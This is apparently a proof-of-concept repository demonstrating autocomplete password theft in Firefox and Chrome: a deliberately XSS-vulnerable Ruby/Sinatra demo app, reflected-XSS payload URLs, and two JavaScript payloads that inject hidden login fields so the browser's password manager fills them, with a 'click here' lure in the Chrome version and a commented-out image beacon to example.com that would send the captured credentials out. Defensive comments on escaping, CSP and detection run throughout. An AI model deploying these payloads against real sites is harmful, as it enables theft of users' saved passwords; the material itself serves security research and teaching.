Autocomplete Password Stealing PoC (FF & Chrome)
#!/usr/bin/env ruby | |
require 'rubygems' | |
require 'thin' | |
require 'rack' | |
require 'sinatra' | |
# Serve the JS payloads statically on :8000:  python -m SimpleHTTPServer
# Start this (deliberately vulnerable) demo app on :4000:  ruby ./server
# http://127.0.0.1:4000/?lang='><script>alert()</script> | |
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-innerHTML.js"></script> | |
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-onClick.js"></script><!-- | |
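# Deliberately vulnerable demo app. Its only job is to give the autocomplete
# payloads (see the header comments) an injection point; the Thin setup below
# this class binds it to 127.0.0.1, and it must stay that way.
class InjectDemo < Sinatra::Base
  # Login page. The inputs carry the ids the JS payloads look up
  # ("username" / "password"). Note they have no `name` attribute, so the
  # browser submits no credentials in the POST body.
  get "/login" do
    "
    <form method='POST' action='/'>
    Username: <input id='username' type='text' value='' /><br />
    Password: <input id='password' type='password' value='' /><br />
    <input type='submit' value='Submit' />
    </form>
    "
  end

  # Landing page. `lang` is reflected into an attribute value UNESCAPED on
  # purpose: this is the reflected-XSS sink the payload URLs in the header
  # comments rely on. In a real app the fix is one line,
  # `lang = Rack::Utils.escape_html(request['lang'] || "en_US")`, plus a
  # Content-Security-Policy that forbids inline and remote scripts.
  get "/" do
    lang = request['lang'] || "en_US"
    "
    <div align=center>
    To login, go to the login page at
    <a href='http://127.0.0.1:4000/login?lang=#{lang}'>http://127.0.0.1:4000/login</a>
    </div>
    "
  end

  # Form target: bounce back to the landing page after one second.
  # The original meta tag had mismatched quotes (`content='1;url='http://...'`),
  # which closed the attribute before the url and left it as stray text.
  post "/" do
    "
    <meta http-equiv='refresh' content='1;url=http://127.0.0.1:4000'>
    "
  end
end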
# Mount the demo app at the root and serve it with Thin on the loopback
# interface only, so the intentionally vulnerable app is never reachable
# from the network.
@routes = {}
@routes["/"] = InjectDemo.new
@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("127.0.0.1", 4000, @rack_app)

# Keep Thin quiet: no request log, no debug output.
Thin::Logging.silent = true
Thin::Logging.debug = false

$stdout.puts("[#{Time.now}] Thin ready")
@thin.start
/* Autocomplete Password Stealing for Firefox */
// Configuration
// All four are implicit globals (no `var`), shared with the functions below.
user_id = "username";   // id of the username <input> that appendDiv creates and stealCreds reads
pass_id = "password";   // id of the password <input>
remembered = ''; // Stored UserName — pre-filled into the injected username field; empty here
// End of configuration
// Reads whatever the browser has placed into the two injected inputs and
// reports it. In this PoC the "report" is only console.log; the commented-out
// Image beacon marks where a real payload would exfiltrate. Defensively, an
// outbound request carrying form values is the signal to look for: CSP
// `img-src`/`connect-src` restrictions and egress logging both catch it.
function stealCreds() {
  un = pw = "";   // implicit globals, no `var`
  un = document.getElementById(user_id).value;
  pw = document.getElementById(pass_id).value;
  // new Image().src = "http://example.com/?" + un + "-" + pw;
  console.log(un + "-" + pw);
  // `check` is the polling timer set at the bottom of the file. It is cleared on
  // the first call regardless of whether the fields were populated yet.
  window.clearInterval(check);
}
// Injects a hidden username/password pair into the page. Ids and names come
// from the config above and both fields are marked autocomplete='on'; per the
// file's title the technique relies on the browser's password manager filling
// saved credentials into these fields even though the user never sees them.
// Defensive takeaway: a password input inside a hidden <div> that the page's
// own markup never declared is a useful DOM-based indicator, and the injection
// only works because the host page let attacker-controlled script run at all.
function appendDiv() {
  var div = document.createElement("div");
  div.id = 'myform';
  div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" +
    "<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";
  document.getElementsByTagName("body")[0].appendChild(div);
  // visibility:hidden keeps the element in the DOM and layout, just invisible.
  document.getElementById('myform').style.visibility = 'hidden';
}
appendDiv();
// Poll every 2 s; stealCreds clears this timer on its first run. The string
// form of setInterval is evaluated like eval, so a CSP without 'unsafe-eval'
// blocks this line outright.
check = window.setInterval("stealCreds();", 2000);
/* Autocomplete Password Stealing for Chrome */
// Configuration
// All of these are implicit globals (no `var`), shared with the functions below.
user_id = "username";   // id of the username <input> that appendDiv creates and stealCreds reads
pass_id = "password";   // id of the password <input>
remembered = ''; // Stored UserName — pre-filled into the injected username field; empty here
message = "<b>Please click here to refresh</b>"; // lure text showMsg inserts via innerHTML
redirect_to = 'http://127.0.0.1:4000'  // navigation target after the click handler runs (no semicolon; ASI)
// End of configuration
// Reads whatever the browser has placed into the two injected inputs and
// reports it. As in the Firefox variant the "report" is only console.log; the
// commented-out Image beacon marks where a real payload would exfiltrate,
// which is what CSP `img-src`/`connect-src` and egress logging should catch.
// No timer here: this version is invoked from the click handler at the bottom.
function stealCreds() {
  un = pw = "";   // implicit globals, no `var`
  un = document.getElementById(user_id).value;
  pw = document.getElementById(pass_id).value;
  // new Image().src = "http://example.com/?" + un + "-" + pw;
  console.log(un + "-" + pw);
}
// Injects a hidden username/password pair into the page, identical to the
// Firefox variant: ids/names from the config, autocomplete='on', and per the
// file's title it relies on the browser filling saved credentials into fields
// the user never sees. A password input inside an undeclared hidden <div> is a
// useful DOM-based indicator for defenders.
function appendDiv() {
  var div = document.createElement("div");
  div.id = 'myform';
  div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" +
    "<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";
  document.getElementsByTagName("body")[0].appendChild(div);
  // visibility:hidden keeps the element in the DOM and layout, just invisible.
  document.getElementById('myform').style.visibility = 'hidden';
}
// Appends a visible paragraph containing `message` (a "click here" lure) to
// the body. Its only purpose is to provoke the click that window.onclick
// below waits for.
function showMsg() {
  var p = document.createElement("p");
  p.innerHTML = message;
  document.getElementsByTagName("body")[0].appendChild(p);
}
appendDiv();
showMsg();
// Unlike the Firefox variant nothing is read until the user clicks anywhere on
// the page; the lure paragraph exists to provoke that click (presumably because
// Chrome fills the password field only after user interaction — confirm against
// the browser version in use). After the read the page navigates to
// redirect_to, which also unloads the injected DOM.
window.onclick = function() {
  stealCreds();
  document.location = redirect_to;
}